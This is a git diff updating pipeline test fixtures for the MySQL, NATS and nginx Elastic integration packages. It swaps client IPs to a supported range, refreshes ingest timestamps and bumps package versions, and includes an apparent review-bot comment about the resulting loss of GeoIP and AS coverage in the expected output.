b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json index 9a70b6b042f..07ab6881b9c 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "duration": 50365000, - "ingested": "2021-06-21T12:35:20.744185651Z", + "ingested": "2021-12-09T13:41:36.598402400Z", "category": [ "database" ], 
@@ -105,7 +105,7 @@ }, "event": { "duration": 153883488000, - "ingested": "2021-06-21T12:35:20.744187718Z", + "ingested": "2021-12-09T13:41:36.598410100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json index 8a1afd3a0d4..55353133f99 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "duration": 10569000, - "ingested": "2021-06-21T12:35:20.946948681Z", + "ingested": "2021-12-09T13:41:36.702401Z", "category": [ "database" ], @@ -104,7 +104,7 @@ }, "event": { "duration": 36112000, - "ingested": "2021-06-21T12:35:20.946949854Z", + "ingested": "2021-12-09T13:41:36.702413600Z", "category": [ "database" ], @@ -155,7 +155,7 @@ }, "event": { "duration": 23385000, - "ingested": "2021-06-21T12:35:20.946950886Z", + "ingested": "2021-12-09T13:41:36.702443800Z", "category": [ "database" ], @@ -210,7 +210,7 @@ }, "event": { "duration": 10278000, - "ingested": "2021-06-21T12:35:20.946951930Z", + "ingested": "2021-12-09T13:41:36.702451500Z", "category": [ "database" ], @@ -261,7 +261,7 @@ }, "event": { "duration": 14315000, - "ingested": "2021-06-21T12:35:20.946952975Z", + "ingested": "2021-12-09T13:41:36.702462700Z", "category": [ "database" ], @@ -312,7 +312,7 @@ }, "event": { "duration": 50365000, - "ingested": "2021-06-21T12:35:20.946954191Z", + "ingested": "2021-12-09T13:41:36.702472500Z", "category": [ "database" ], @@ -378,7 +378,7 @@ }, "event": { "duration": 32463768000, - "ingested": "2021-06-21T12:35:20.946955255Z", + "ingested": "2021-12-09T13:41:36.702507500Z", "category": [ "database" ], 
@@ -445,7 +445,7 @@ }, "event": { "duration": 153883488000, - "ingested": "2021-06-21T12:35:20.946956305Z", + "ingested": "2021-12-09T13:41:36.702586Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json index 71399ca1be2..182ac790fc8 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json @@ -27,7 +27,7 @@ }, "event": { "duration": 2746607000, - "ingested": "2021-06-21T12:35:21.423165153Z", + "ingested": "2021-12-09T13:41:37.032283100Z", "category": [ "database" ], @@ -91,7 +91,7 @@ }, "event": { "duration": 3133066000, - "ingested": "2021-06-21T12:35:21.423166150Z", + "ingested": "2021-12-09T13:41:37.032302500Z", "category": [ "database" ], diff --git a/packages/mysql/manifest.yml b/packages/mysql/manifest.yml index 7a33d67379b..7420c525fcd 100644 --- a/packages/mysql/manifest.yml +++ b/packages/mysql/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: mysql title: MySQL -version: 1.2.0 +version: 1.2.1 license: basic description: Collect logs and metrics from MySQL servers with Elastic Agent. type: integration diff --git a/packages/nats/changelog.yml b/packages/nats/changelog.yml index f0c1dce429f..f8981e17f21 100644 --- a/packages/nats/changelog.yml +++ b/packages/nats/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release nats package for v8.0.0 
diff --git a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log
index 1633bf0d183..59308611cf0 100644
--- a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log
+++ b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log
@@ -7,13 +7,13 @@
 [1] 2019/02/06 07:20:08.512052 [TRC] 172.18.0.1:38630 - cid:1 - ->> [SUB foo 1]
 [1] 2019/02/06 07:20:08.512128 [TRC] 172.18.0.1:38630 - cid:1 - ->> [PING]
 [1] 2019/02/06 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - <<- [PONG]
-[1] 2019/02/04 15:40:02.717819 [TRC] 50.39.246.116:62388 - cid:3 - ->> [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]
-[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - ->> MSG_PAYLOAD: [peer, are you alive?]
-[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - <<- MSG_PAYLOAD: [\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"]
+[1] 2019/02/04 15:40:02.717819 [TRC] 67.43.156.14:62388 - cid:3 - ->> [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]
+[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - ->> MSG_PAYLOAD: [peer, are you alive?]
+[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - <<- MSG_PAYLOAD: [\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"]
 [1] 2019/02/04 15:40:02.717832 [TRC] 192.168.176.11:36262 - cid:4 - <<- [MSG aiuser.platinum1.pingpeer 1 _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]
 [1] 2019/02/04 15:40:02.718007 [TRC] 192.168.176.11:36262 - cid:4 - ->> [PUB _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 17]
 [1] 2019/02/04 15:40:02.718023 [TRC] 192.168.176.11:36262 - cid:4 - ->> MSG_PAYLOAD: [I am fine, agent!]
-[1] 2019/02/04 15:40:02.718044 [TRC] 50.39.246.116:62388 - cid:3 - <<- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17]
-[1] 2019/02/04 15:40:02.717600 [TRC] 50.39.246.116:62388 - cid:3 - ->> [PUB aiuser.platinum1.appstats 1583]
+[1] 2019/02/04 15:40:02.718044 [TRC] 67.43.156.14:62388 - cid:3 - <<- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17]
+[1] 2019/02/04 15:40:02.717600 [TRC] 67.43.156.14:62388 - cid:3 - ->> [PUB aiuser.platinum1.appstats 1583]
 [1] 2019/02/04 15:40:02.717811 [TRC] 192.168.176.11:36262 - cid:4 - <<- [MSG aiuser.platinum1.appstats 6 1583]
 [1] 2019/02/16 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - <<- [OK]
\ No newline at end of file
diff --git a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json
index 1acf51e309c..29a7ea6897b 100644
--- a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json
+++ b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json
@@ -17,7 +17,7 @@
 "level": "info"
 },
 "event": {
- "ingested": "2021-10-27T10:26:49.197765249Z",
+ "ingested": "2021-12-09T13:41:38.300043500Z",
 "original": "[1] 2019/02/06 07:19:40.624334 [INF] Starting nats-server version 1.3.0",
 "type": [
 "info"
@@ -47,7 +47,7 @@
 "level": "info"
 },
 "event": {
- "ingested": "2021-10-27T10:26:49.197769348Z",
+ "ingested": "2021-12-09T13:41:38.300056800Z",
 "original": "[1] 2019/02/06 07:19:40.624547 [INF] Git commit [eed4fbc]",
 "type": [
 "info"
@@ -77,7 +77,7 @@
 "level": "info"
 },
 "event": {
- "ingested": "2021-10-27T10:26:49.197771417Z",
+ "ingested": "2021-12-09T13:41:38.300065700Z",
 "original": "[1] 2019/02/06 07:19:40.624674 [INF] Listening for client connections on 0.0.0.0:4222",
 "type": [
 "info"
@@ -107,7 +107,7 @@ "level": "info" }, "event": { - "ingested": "2021-10-27T10:26:49.197773209Z", + "ingested": "2021-12-09T13:41:38.300073600Z", "original": "[1] 2019/02/06 07:19:40.624690 [INF] Server is ready", "type": [ "info" @@ -153,7 +153,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197775006Z", + "ingested": "2021-12-09T13:41:38.300081500Z", "original": "[1] 2019/02/06 07:20:08.508891 [DBG] 172.18.0.1:38630 - cid:1 - Client connection created", "type": [ "info" @@ -200,7 +200,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197776708Z", + "ingested": "2021-12-09T13:41:38.300092400Z", "original": "[1] 2019/02/06 07:20:08.510296 [TRC] 172.18.0.1:38630 - cid:1 - -\u003e\u003e [CONNECT {\"verbose\":false,\"pedantic\":false,\"tls_required\":false,\"name\":\"NATS Benchmark\",\"lang\":\"go\",\"version\":\"1.7.0\",\"protocol\":1,\"echo\":true}]", "type": [ "info" @@ -248,7 +248,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197778387Z", + "ingested": "2021-12-09T13:41:38.300100900Z", "original": "[1] 2019/02/06 07:20:08.512052 [TRC] 172.18.0.1:38630 - cid:1 - -\u003e\u003e [SUB foo 1]", "type": [ "info" @@ -294,7 +294,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197780020Z", + "ingested": "2021-12-09T13:41:38.300108600Z", "original": "[1] 2019/02/06 07:20:08.512128 [TRC] 172.18.0.1:38630 - cid:1 - -\u003e\u003e [PING]", "type": [ "info" @@ -340,7 +340,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197781703Z", + "ingested": "2021-12-09T13:41:38.300116600Z", "original": "[1] 2019/02/06 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - \u003c\u003c- [PONG]", "type": [ "info" 
@@ -381,16 +381,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197783401Z", - "original": "[1] 2019/02/04 15:40:02.717819 [TRC] 50.39.246.116:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]", + "ingested": "2021-12-09T13:41:38.300124900Z", + "original": "[1] 2019/02/04 15:40:02.717819 [TRC] 67.43.156.14:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]", "type": [ "info" ], @@ -427,16 +427,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197785054Z", - "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - -\u003e\u003e MSG_PAYLOAD: [peer, are you alive?]", + "ingested": "2021-12-09T13:41:38.300133Z", + "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - -\u003e\u003e MSG_PAYLOAD: [peer, are you alive?]", "type": [ "info" ], @@ -473,16 +473,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197786896Z", - "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - \u003c\u003c- MSG_PAYLOAD: [\\\"\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"]", + "ingested": "2021-12-09T13:41:38.300141700Z", + "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - \u003c\u003c- MSG_PAYLOAD: [\\\"\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"]", "type": [ "info" ], 
@@ -531,7 +531,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197788580Z", + "ingested": "2021-12-09T13:41:38.300148600Z", "original": "[1] 2019/02/04 15:40:02.717832 [TRC] 192.168.176.11:36262 - cid:4 - \u003c\u003c- [MSG aiuser.platinum1.pingpeer 1 _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]", "type": [ "info" @@ -579,7 +579,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197790211Z", + "ingested": "2021-12-09T13:41:38.300153800Z", "original": "[1] 2019/02/04 15:40:02.718007 [TRC] 192.168.176.11:36262 - cid:4 - -\u003e\u003e [PUB _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 17]", "type": [ "info" @@ -625,7 +625,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197791877Z", + "ingested": "2021-12-09T13:41:38.300160800Z", "original": "[1] 2019/02/04 15:40:02.718023 [TRC] 192.168.176.11:36262 - cid:4 - -\u003e\u003e MSG_PAYLOAD: [I am fine, agent!]", "type": [ "info" @@ -666,16 +666,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197793541Z", - "original": "[1] 2019/02/04 15:40:02.718044 [TRC] 50.39.246.116:62388 - cid:3 - \u003c\u003c- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17]", + "ingested": "2021-12-09T13:41:38.300169300Z", + "original": "[1] 2019/02/04 15:40:02.718044 [TRC] 67.43.156.14:62388 - cid:3 - \u003c\u003c- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17]", "type": [ "info" ], 
@@ -714,16 +714,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197795278Z", - "original": "[1] 2019/02/04 15:40:02.717600 [TRC] 50.39.246.116:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.appstats 1583]", + "ingested": "2021-12-09T13:41:38.300177100Z", + "original": "[1] 2019/02/04 15:40:02.717600 [TRC] 67.43.156.14:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.appstats 1583]", "type": [ "info" ], @@ -771,7 +771,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197796956Z", + "ingested": "2021-12-09T13:41:38.300183300Z", "original": "[1] 2019/02/04 15:40:02.717811 [TRC] 192.168.176.11:36262 - cid:4 - \u003c\u003c- [MSG aiuser.platinum1.appstats 6 1583]", "type": [ "info" @@ -817,7 +817,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197798598Z", + "ingested": "2021-12-09T13:41:38.300190700Z", "original": "[1] 2019/02/16 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - \u003c\u003c- [OK]", "type": [ "info" diff --git a/packages/nats/manifest.yml b/packages/nats/manifest.yml index 22e84a7e150..b5b42028ea3 100644 --- a/packages/nats/manifest.yml +++ b/packages/nats/manifest.yml @@ -1,6 +1,6 @@ name: nats title: NATS -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs and metrics from NATS servers with Elastic Agent. type: integration diff --git a/packages/nginx/changelog.yml b/packages/nginx/changelog.yml index ce8f9586beb..05b88bf7e0c 100644 --- a/packages/nginx/changelog.yml +++ b/packages/nginx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.1" changes: - description: Fix ML module manifest query to ignore frozen and cold tiers 
diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log
index 7acb1428af8..10715a8ff94 100644
--- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log
+++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log
@@ -1,11 +1,11 @@
-77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
-77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
-77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
-77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+67.43.156.13 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
+67.43.156.13 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
+67.43.156.13 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
+67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+67.43.156.13 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+67.43.156.13 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
+67.43.156.13 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
 127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
 127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
 127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json index bd1119951d8..778ef7889f7 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json @@ -4,31 +4,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -44,7 +26,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -60,8 +42,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246637400Z", - "original": "77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653051900Z", + "original": "67.43.156.13 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ 
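Review bot: The regenerated expectation for `67.43.156.13` in the `@@ -4,31 +4,13` hunk carries no `source.geo` or `source.as` object — the hunk deletes both and adds only `"address"`/`"ip"` — so this fixture no longer exercises the access pipeline's GeoIP and AS enrichment for an IPv4 client; the sibling hunks `@@ -90`, `@@ -178`, `@@ -264`, `@@ -350`, `@@ -438`, `@@ -524`, `@@ -610` and the `67.43.156.14` hunks in test-nginx.log-expected.json repeat it. Presumably the new address has no entry in the GeoIP database the test stack uses; the IPv6 replacement in test-test-with-host.log-expected.json, by contrast, gains country and AS fields. Keeping at least one IPv4 fixture on an address that resolves in that database, or stating in the changelog entry that geo enrichment is intentionally absent from these cases, would preserve or at least document the lost coverage. These are the fields geo-based detection rules key on, so a regression in that enrichment would now pass this test unnoticed.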
@@ -90,31 +72,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/favicon.ico", @@ -131,7 +95,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -148,8 +112,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246664400Z", - "original": "77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653067Z", + "original": "67.43.156.13 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ 
@@ -178,31 +142,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/adsasd", @@ -218,7 +164,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -234,8 +180,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246673500Z", - "original": "77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653072600Z", + "original": "67.43.156.13 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -264,31 +210,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", 
